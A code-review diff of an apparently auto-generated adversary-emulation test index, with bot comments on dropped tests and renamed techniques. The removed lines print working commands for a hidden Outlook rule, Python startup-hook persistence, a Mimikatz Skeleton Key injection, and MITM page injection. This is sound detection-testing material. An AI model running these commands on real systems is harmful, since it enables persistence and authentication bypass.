'$namespace = $outlook.GetNamespace("MAPI")',
'$rules = $namespace.DefaultStore.GetRules()',
'$rule = $rules.Create($hiddenName, 0)',
'$cond = $rule.Conditions.Subject',
'$cond.Enabled = $true',
'$cond.Text = @("#{trigger_subject}")',
'$action = $rule.Actions.PlaySound',
'$action.Enabled = $true',
'$action.FilePath = "#{sound_file_path}"',
'$rule.Enabled = $true',
'$rules.Save()',
'Write-Host "[+] Hidden rule created with zero-width space name."',
'Write-Host "[*] Open Outlook via File -> Manage Rules and Alerts - rule name will appear blank."',
'Write-Host "[*] Verify rule exists via PowerShell COM enumeration (Test 4) or Get-InboxRule in Exchange."'
)
$lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
Remove-Item $tmpScript -ErrorAction SilentlyContinue
cleanup_command: |
$isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
if ($isAdmin) {
Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
exit 1
}
$tmpScript = "$env:TEMP\T1137005_hidden_rule_cleanup.ps1"
$lines = @(
'$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
'$outlook = New-Object -ComObject Outlook.Application',
'$namespace = $outlook.GetNamespace("MAPI")',
'$rules = $namespace.DefaultStore.GetRules()',
'$removed = $false',
'for ($i = $rules.Count; $i -ge 1; $i--) {',
' if ($rules.Item($i).Name -eq $hiddenName) {',
' $rules.Remove($rules.Item($i).Name)',
' $removed = $true',
' }',
'}',
'if ($removed) {',
' $rules.Save()',
' Write-Host "[+] Hidden rule(s) removed."',
'} else {',
' Write-Host "[-] Hidden rule not found - may have already been removed."',
'}'
)
$lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
Remove-Item $tmpScript -ErrorAction SilentlyContinue
atomic_tests: []
T1098.007:
technique:
type: attack-pattern
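Review bot: the only line this hunk adds is `atomic_tests: []`, so the five T1137.005 Outlook-rule tests above it (subject trigger, sender trigger, auto-forward, rule enumeration and the hidden blank-name rule) disappear from the generated index while the `T1098.007:` entry that follows is untouched. If the Python generator is meant to reproduce the previous index, this is a regression in how it attaches tests to techniques rather than an intentional deletion, and the commit message should say which it is. A cheap pre-merge check: count `auto_generated_guid:` lines in the old and new index; a faithful conversion should leave that number unchanged.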
@@ -73113,7 +71751,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-21T02:35:20.850Z'
name: 'Event Triggered Execution: Python Startup Hooks'
name: Python Startup Hooks
description: "Adversaries may achieve persistence by leveraging Pythons startup
mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py`
or `usercustomize.py` modules. These files are automatically processed during
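Review bot: `name` changes from the quoted `'Event Triggered Execution: Python Startup Hooks'` to the bare sub-technique name `Python Startup Hooks` while `modified: '2025-10-21T02:35:20.850Z'` is unchanged, so this is a generator-side change in how the ATT&CK display name is rendered, not an upstream data refresh. Anything downstream that matches on the `Parent: Sub-technique` form will stop matching; either keep the composed form or record the new convention where the generator is documented. Dropping the single quotes is harmless, since the new value no longer contains a colon.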
@@ -73149,239 +71787,7 @@ persistence:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1546.018
atomic_tests:
- name: Python Startup Hook - atomic_hook.pth (Windows)
auto_generated_guid: 57289962-21dc-4501-b756-80cd30608d9f
description: "Executes code by placing a .pth file in the site-packages directory.
\nSupports python.exe and python3.exe via input arguments.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test.
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$TempDir = Join-Path $env:TEMP "atomic_pth_win"
New-Item -ItemType Directory -Path $TempDir -Force
& "#{python_exe}" -m venv "$TempDir\env"
$SitePackages = & "$TempDir\env\Scripts\python.exe" -c "import site; print(site.getsitepackages()[1])"
"import os, subprocess; os.environ.get('CALC_SPAWNED') or (os.environ.update({'CALC_SPAWNED':'1'}) or subprocess.Popen(['calc.exe']))" | Out-File -Encoding ASCII "$SitePackages\atomic_hook.pth"
Get-ChildItem -Path "$SitePackages" | Where-Object { $_.Name -like "*.pth" }
& "$TempDir\env\Scripts\python.exe" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if (-not (Get-ChildItem -Path $env:TEMP -ErrorAction SilentlyContinue | Where-Object Name -like 'atomic_pth_win')) { Write-Host "[!] Artifact missing: $env:Temp\atomic_pth_win Folder - [-] Please Run : Invoke-AtomicTest T1546.018"; exit 1 };
Remove-Item -Path "$env:TEMP\atomic_pth_win" -Recurse -Force
Write-Host "[+] Successfully Removed atomic_pth_win folder and atomic_hook.pth from Temp Directory"
Get-Process -Name "Calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Get-Process -Name "calc*" -ErrorAction SilentlyContinue | Stop-Process -Force
Write-Host "[+] Successfully Terminated Calculator"
- name: Python Startup Hook - usercustomize.py (Windows)
auto_generated_guid: 05cc7a2c-ce32-46f2-a358-f27f76718c39
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require Administrative privileges.\n"
supported_platforms:
- windows
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python.exe
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: 'if (Get-Command @("#{python_exe}", ''python3.exe'') -ErrorAction
SilentlyContinue) { exit 0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "[!] Python3 not found. Please install Python3
(e.g., winget install python3 or winget install python or https://www.python.org/downloads/windows/)
or ensure it is in your PATH."
'
executor:
name: powershell
elevation_required: false
command: |
$UserDir = & "#{python_exe}" -c "import site; print(site.getusersitepackages())"
if (!(Test-Path $UserDir)) { New-Item -ItemType Directory -Path $UserDir -Force }
"import os; os.system('calc.exe')" | Out-File -FilePath "$UserDir\usercustomize.py" -Encoding ASCII
Get-ChildItem -Path "$UserDir"
& "#{python_exe}" -c "print('Triggering Hook via usercustomize...')"
cleanup_command: "$PyBin = if (Get-Command \"#{python_exe}\" -ErrorAction
SilentlyContinue) { \"#{python_exe}\" } elseif (Get-Command \"python3.exe\"
-ErrorAction SilentlyContinue) { \"python3.exe\" } else { \"python.exe\"
}; \n$UserDir = & $PyBin -S -c \"import site; print(site.getusersitepackages())\"\nif
(-not (Get-ChildItem -Path $UserDir -Recurse -ErrorAction SilentlyContinue
| Where-Object Name -like 'usercustomize*')) { Write-Host \"[!] Artifact
missing: $UserDir\\usercustomize.py - [-] Please Run : Invoke-AtomicTest
T1546.018\"; exit 1 };\nGet-ChildItem -Path \"$UserDir\" -Recurse -Force
|\nWhere-Object { $_.Name -like \"usercustomize*\" } |\nRemove-Item -Force
\nWrite-Host \"[+] Successfully Removed usercustomize.py under $UserDir\"\nGet-Process
-Name \"Calc*\", \"calc*\" -ErrorAction SilentlyContinue | Stop-Process
-Force\nWrite-Host \"[+] Successfully Terminated Calculator\"\n"
- name: Python Startup Hook - atomic_hook.pth (Linux)
auto_generated_guid: a58c066d-f2f0-42a2-ab70-30af73f89e66
description: "Executes code by creating atomic_hook.pth in the site-packages
directory. \nThis script runs automatically for every user on the system when
Python starts.\n"
supported_platforms:
- linux
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'')."
'
executor:
name: sh
elevation_required: false
command: |
TEMPDIR="/tmp/atomic_sitecust_posix"
mkdir -p "$TEMPDIR"
"#{python_exe}" -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import os; os.system('cat /etc/passwd 1> /tmp/atomic_hook_poc.txt')" > "$SITE_PACKAGES/atomic_hook.pth"
ls -la "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
if [ -f /tmp/atomic_hook_poc.txt ]; then echo "[+] Success: atomic_hook_poc.txt created under /tmp \n" $(ls -la /tmp/ | grep -w atomic_hook_poc.txt); else echo "Failed: /tmp/atomic_hook_poc.txt not found"; fi
cleanup_command: |
if [ ! -f /tmp/atomic_hook_poc.txt ] || [ ! -d /tmp/atomic_sitecust_posix ]; then echo "[!] Missing artifact or folder: /tmp/atomic_hook_poc.txt or /tmp/atomic_sitecust_posix — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
rm -rf /tmp/atomic_sitecust_posix
echo "[+] Successful Removed atomic_hook.pth"
rm -rf /tmp/atomic_hook_poc.txt
echo "[+] Successful Removed atomic_hook_poc.txt under /tmp"
- name: Python Startup Hook - atomic_hook.pth (macOS)
auto_generated_guid: 28ca4f81-fa96-47ff-8555-dde98017e89b
description: 'Creates a Python startup hook using a .pth file inside a virtual
environment on macOS.
'
supported_platforms:
- macos
input_arguments:
exe_name:
description: App to launch
type: string
default: Calculator
python_exe:
description: The python binary name to test
type: string
default: python3
dependency_executor_name: sh
dependencies:
- description: Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
prereq_command: |
PYTHON_CMD=$(command -v python || command -v #{python_exe})
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python3 not found. Please install it using Homebrew
(''brew install python'' or ''brew install python3 or brew install python@3.X'')
or the macOS developer tools (''xcode-select --install'')."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
TEMPDIR=$(mktemp -d /tmp/atomic_python_hook_XX)
echo "$TEMPDIR" > /tmp/atomic_python_hook_path.txt
$PYTHON_EXE -m venv "$TEMPDIR/env"
SITE_PACKAGES=$("$TEMPDIR/env/bin/#{python_exe}" -c "import site; print(site.getsitepackages()[0])")
echo "import subprocess; subprocess.Popen(['open', '-a', '#{exe_name}'])" > "$SITE_PACKAGES/atomic_hook.pth"
"$TEMPDIR/env/bin/python" -c "print('Triggering Hook via atomic_hook...')"
cleanup_command: |
if [ ! -f /tmp/atomic_python_hook_path.txt ] || [ ! -d $(cat /tmp/atomic_python_hook_path.txt) ]; then echo "[!] Artifact missing: /tmp/atomic_python_hook_path.txt — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
pkill "#{exe_name}" || true
[ -f /tmp/atomic_python_hook_path.txt ] && rm -rf $(cat /tmp/atomic_python_hook_path.txt) && rm -f /tmp/atomic_python_hook_path.txt
echo "[+] Successful Removed atomic_hook.pth and terminated #{exe_name}"
- name: Python Startup Hook - usercustomize.py (Linux / MacOS)
auto_generated_guid: 6e78084a-a433-4702-a838-cc7b765d87e8
description: "Executes code via usercustomize.py. This is a per-user persistence
mechanism \nthat does not require root privileges.\n"
supported_platforms:
- linux
- macos
input_arguments:
python_exe:
description: The python binary name to test
type: String
default: python3
dependency_executor_name: sh
dependencies:
- description: 'Python must be installed and the specified binary (#{python_exe})
must be in the PATH.
'
prereq_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
if [ -z "$PYTHON_CMD" ]; then exit 1; fi
$PYTHON_CMD -m venv --help >/dev/null 2>&1
get_prereq_command: 'echo "Python not found. Please install Python using your
package manager (e.g., Debian Based ''sudo apt-get update && sudo apt-get
install -y python3 python3-venv'', RedHat / CentOS Based ''sudo yum install
-y python3 python3-venv || sudo dnf install -y python3 python3-venv'', MacOS
brew install python3 or brew install python@3.x or the macOS developer tools
(''xcode-select --install''))."
'
executor:
name: sh
elevation_required: false
command: |
PYTHON_EXE=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_EXE -c "import site; print(site.getusersitepackages())")
mkdir -p "$USER_PACKAGES"
echo "import os; os.system('date > /tmp/poc.txt')" > "$USER_PACKAGES/usercustomize.py"
if [ -f "$USER_PACKAGES/usercustomize.py" ]; then echo "Success: usercustomize.py created under $USER_PACKAGES\n" $(ls -la "$USER_PACKAGES" | grep usercustomize*); else echo "Failed: usercustomize.py not found under $USER_PACKAGES"; fi
$PYTHON_EXE -c "print('Triggering Hook via usercustomize.py...')"
if [ -f /tmp/poc.txt ]; then echo "Success: poc.txt created under /tmp\n" $(ls -la /tmp/ | grep -w poc.txt); else echo "Failed: /tmp/poc.txt not found"; fi
cleanup_command: |
PYTHON_CMD=$(command -v #{python_exe} || command -v python)
USER_PACKAGES=$($PYTHON_CMD -S -c "import site; print(site.getusersitepackages())")
if [ ! -f /tmp/poc.txt ] || [ ! -f $USER_PACKAGES/usercustomize.py ]; then echo "[!] Artifact missing: /tmp/poc.txt and $USER_PACKAGES/usercustomize.py — [-] Please Run : Invoke-AtomicTest T1546.018"; exit 0; fi
if [ -e "$USER_PACKAGES"/usercustomize* ]; then echo "[+] Successful remove $USER_PACKAGES/usercustomize.py\n" $(rm -rf "$USER_PACKAGES"/usercustomize*); else echo "usercustomize.py not found under $USER_PACKAGES"; fi
rm -rf /tmp/poc.txt
echo "[+] Successful remove poc.txt under /tmp"
atomic_tests: []
T1037.003:
technique:
type: attack-pattern
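Review bot: besides the five Python Startup Hook tests, this hunk also removes `identifier: T1546.018`, which sat at the same level as `technique:` and `atomic_tests:`; the hunk header's 239 old lines against 7 new confirms that nothing but `atomic_tests: []` survives on the new side. Removing `identifier` is a schema change for every technique entry, even though its value duplicates the map key (as `T1037.003:` does for the next entry), and any consumer that reads the `identifier` field instead of the key will fail with a missing-key error. Keep the field in the new generator's output, or call out its removal explicitly so consumers can be updated.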
@@ -74200,7 +72606,7 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
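Review bot: same `name` rewrite as in the T1546.018 hunk above (`'Modify Authentication Process: Domain Controller Authentication'` becomes `Domain Controller Authentication`), again with `modified` untouched. If stripping the parent prefix is deliberate, do it in one place in the generator and note it once rather than letting it surface as an unexplained per-technique diff; if it is a side effect of emitting the sub-technique object's own `name` field instead of a display name composed with the parent technique, say so, because the two are not interchangeable for anything that rendered the old value.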
@@ -74230,54 +72636,7 @@ persistence:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
dependency_executor_name: powershell
dependencies:
- description: Mimikatz must be present on the host machine at
prereq_command: 'if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
executor:
command: '& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
'
cleanup_command: |
Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
Restart-Computer -Force
name: powershell
elevation_required: true
atomic_tests: []
T1556.005:
technique:
type: attack-pattern
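Review bot: the removed Skeleton Key test is the one entry in this region whose cleanup reboots the host (`Restart-Computer -Force`) and whose description says it must not run on a production DC; dropping it from the index hides that warning from anyone who drives tests from the index rather than from the per-technique YAML. Worth checking whether the generator dropped it for a structural reason rather than by design: its `executor` block lists `command` and `cleanup_command` before `name: powershell` and `elevation_required: true`, and its dependency description ends mid-sentence (`Mimikatz must be present on the host machine at`), so a stricter loader could be rejecting the record instead of emitting it. `identifier: T1556.001` goes too, as in the earlier hunks.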
@@ -77305,7 +75664,7 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:25.458Z'
name: 'Dynamic Resolution: Domain Generation Algorithms'
name: Domain Generation Algorithms
description: |-
Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
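Review bot: this is the third instance of the `name` prefix strip (`'Dynamic Resolution: Domain Generation Algorithms'` to `Domain Generation Algorithms`), and the hunk header shows it under `command-and-control:` rather than `persistence:`, so the rename is global across tactic sections. Treat it as one change with one explanation rather than many incidental diffs; a short note on the new naming rule in the generator would let reviewers skip these hunks entirely.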
@@ -77332,45 +75691,7 @@ command-and-control:
- Windows
- ESXi
x_mitre_version: '1.2'
identifier: T1568.002
atomic_tests:
- name: DGA Simulation (Python)
auto_generated_guid: cc367493-3a00-4c4a-a685-16b73339167c
description: "Simulates Domain Generation Algorithm (DGA) traffic by generating
pseudo-random domains based on the current date and querying them using dig.
\nThis is designed to trigger DNS analytics and NGIDS.\n"
supported_platforms:
- linux
input_arguments:
python_script_path:
description: Full path to the DGA python script
type: string
default: PathToAtomicsFolder/T1568.002/src/T1568.002.py
dependency_executor_name: bash
dependencies:
- description: "#{python_script_path} must exist on system.\n"
prereq_command: 'if [ -f "#{python_script_path}" ]; then exit 0; else exit
1; fi
'
get_prereq_command: |
mkdir -p "$(dirname "#{python_script_path}")"
curl -sL "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1568.002/src/T1568.002.py" -o "#{python_script_path}"
- description: 'Python 3 must be installed to run the script.
'
prereq_command: 'which python3
'
get_prereq_command: 'sudo apt-get update && sudo apt-get install -y python3
'
executor:
command: 'python3 "#{python_script_path}"
'
name: bash
elevation_required: false
atomic_tests: []
T1071.004:
technique:
type: attack-pattern
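Review bot: with `atomic_tests: []` replacing the DGA Simulation test here as well, every hunk in this diff that touches `atomic_tests` lands on the same 7-line new side (three context lines, the empty list, three context lines) in both the `persistence:` and `command-and-control:` sections, which points at the generator emitting an empty list for every technique rather than at a per-test filter. A regression test in the generator's suite that asserts the index contains at least one test for each technique with an atomics directory would have caught this; `identifier: T1568.002` is dropped here as in the other hunks.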
@@ -78334,126 +76655,7 @@ command-and-control:
- macOS
- Windows
x_mitre_version: '1.0'
identifier: T1659
atomic_tests:
- name: MITM Proxy Injection
auto_generated_guid: 9b360eaf-c778-4f07-a6e7-895c4f01ac1c
description: Start mitmdump and verify injected header and HTML content.
supported_platforms:
- macos
- linux
dependencies:
- description: python3 must be installed
prereq_command: 'command -v python3
'
get_prereq_command: 'brew install python3 || (sudo apt-get update && sudo
apt-get install -y python3) || sudo yum install -y python3
'
- description: curl must be installed
prereq_command: 'command -v curl
'
get_prereq_command: 'brew install curl || (sudo apt-get update && sudo apt-get
install -y curl) || sudo yum install -y curl
'
- description: pipx must be installed
prereq_command: 'pipx --version
'
get_prereq_command: 'brew install pipx || (sudo apt-get update && sudo apt-get
install -y pipx) || sudo yum install -y pipx
'
- description: mitmproxy must be installed
prereq_command: 'pipx list | grep mitmproxy
'
get_prereq_command: 'pipx install mitmproxy || brew install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'lsof -i tcp:8080 | grep mitmdump
'
get_prereq_command: |
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n if 'text/html' in flow.response.headers.get('content-type',''):\n flow.response.headers['X-Atomic']='T1659'\n flow.response.text = flow.response.text.replace('</body>', '<script>alert(\"Atomic T1659 Injection\")</script></body>')" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
executor:
name: bash
command: |
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
cleanup_command: |
rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true
- name: MITM Proxy Injection (Windows)
auto_generated_guid: dcc2ca85-a21c-43a4-acc7-7314d4e5891c
description: Start mitmdump proxy with injection script in the background.
supported_platforms:
- windows
dependencies:
- description: Python must be installed
prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
0 } else { exit 1 }
'
get_prereq_command: 'winget install --id Python.Python.3 -e
'
- description: curl must be installed
prereq_command: 'if (Get-Command curl.exe -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
get_prereq_command: 'winget install --id cURL.cURL -e
'
- description: mitmproxy must be installed and in PATH
prereq_command: 'if (Get-Command mitmdump -ErrorAction SilentlyContinue) {
exit 0 } else { exit 1 }
'
get_prereq_command: 'python -m pip install mitmproxy
'
- description: mitmdump must be running on port 8080
prereq_command: 'if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue
| Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name
-like "*mitmdump*" }) { exit 0 } else { exit 1 }
'
get_prereq_command: |
$code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
Start-Sleep -Seconds 5
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
executor:
name: powershell
elevation_required: false
command: |
curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
$OutPath = "$env:TEMP\atomic_t1659_page.html"
curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
$Content = Get-Content -Path $OutPath -Raw
if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
cleanup_command: |
Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
atomic_tests: []
T1205:
technique:
type: attack-pattern
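Review bot: the `identifier: T1659` key is dropped together with the tests (126 lines collapse to 7), so the entry keeps `atomic_tests: []` but no longer carries its technique identifier; if only the tests are meant to go, keep `identifier: T1659` so the entry matches the shape of the others in the index. The same T1659 block is removed again under initial-access further down, so the commit message should say why both copies are dropped rather than leaving it implicit in a "python conversion" commit.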
@@ -83627,6 +81829,7 @@ collection:
auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
description: |
Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
[Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
supported_platforms:
- windows
@@ -83668,45 +81871,6 @@ collection:
'
name: powershell
elevation_required: true
- name: RDP Bitmap Cache Extraction via bmc-tools
auto_generated_guid: 98f19852-7348-4f99-9e15-6ff4320464c7
description: |
Simulates an attacker extracting the RDP bitmap cache using the ANSSI "bmc-tools.py" script.
This test requires valid RDP bitmap cache files to exist on the system (usually created after an outgoing RDP connection is made).
supported_platforms:
- windows
input_arguments:
cache_path:
description: Path to the RDP Cache directory or specific .bmc file
type: path
default: "$env:LOCALAPPDATA\\Microsoft\\Terminal Server Client\\Cache"
output_dir:
description: Directory to save reconstructed images
type: path
default: "$env:TEMP\\rdp_screens"
dependency_executor_name: powershell
dependencies:
- description: 'Python must be installed and in the PATH to run bmc-tools.py
'
prereq_command: 'if (Get-Command python -ErrorAction SilentlyContinue) { exit
0 } else { exit 1 }
'
get_prereq_command: 'Write-Host "Please install Python manually."
'
executor:
name: powershell
elevation_required: false
command: "$url = 'https://raw.githubusercontent.com/ANSSI-FR/bmc-tools/master/bmc-tools.py'\n$toolsDir
= \"$env:TEMP\\bmc-tools.py\"\n \n# create output directory\nNew-Item -ItemType
Directory -Path #{output_dir} -Force | Out-Null\n\n# python script download\n&
curl.exe -L $url --output $toolsDir\n \n# execution step\nif (Test-Path
$toolsDir) { python $toolsDir -s \"#{cache_path}\" -d #{output_dir} -b }\n"
cleanup_command: |
Remove-Item "$env:TEMP\bmc-tools.py" -ErrorAction SilentlyContinue
Remove-Item #{output_dir} -Recurse -Force -ErrorAction SilentlyContinue
T1557:
technique:
type: attack-pattern
@@ -99718,7 +97882,7 @@ credential-access:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:27.324Z'
name: 'Modify Authentication Process: Domain Controller Authentication'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
\n\nMalware may be used to inject false credentials into the authentication
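Review bot: `name` changes from 'Modify Authentication Process: Domain Controller Authentication' to 'Domain Controller Authentication' while `modified: '2025-10-24T17:49:27.324Z'` is unchanged, so the two generators are rendering the same STIX object differently rather than picking up a newer upstream object. Decide whether the index should carry the bare sub-technique name or the parent-prefixed display name and apply that consistently; the same rename shows up for T1546.018 in the privilege-escalation hunk below.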
@@ -99748,54 +97912,7 @@ credential-access:
x_mitre_platforms:
- Windows
x_mitre_version: '2.1'
identifier: T1556.001
atomic_tests:
- name: Skeleton Key via Mimikatz
auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
description: |
Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
This test must be run on an isolated domain controller and must not be performed on a production DC.
Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
supported_platforms:
- windows
input_arguments:
mimikatz_path:
type: path
default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
description: Path to the mimikatz executable
file_path:
type: path
default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
description: File path where the zipped mimikatz file is downloaded to
mimikatz_url:
type: url
default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
description: The URL for the mimikatz release zip
directory_path:
type: path
default: C:\ExternalPayloads\Mimikatz
description: Directory path for mimikatz
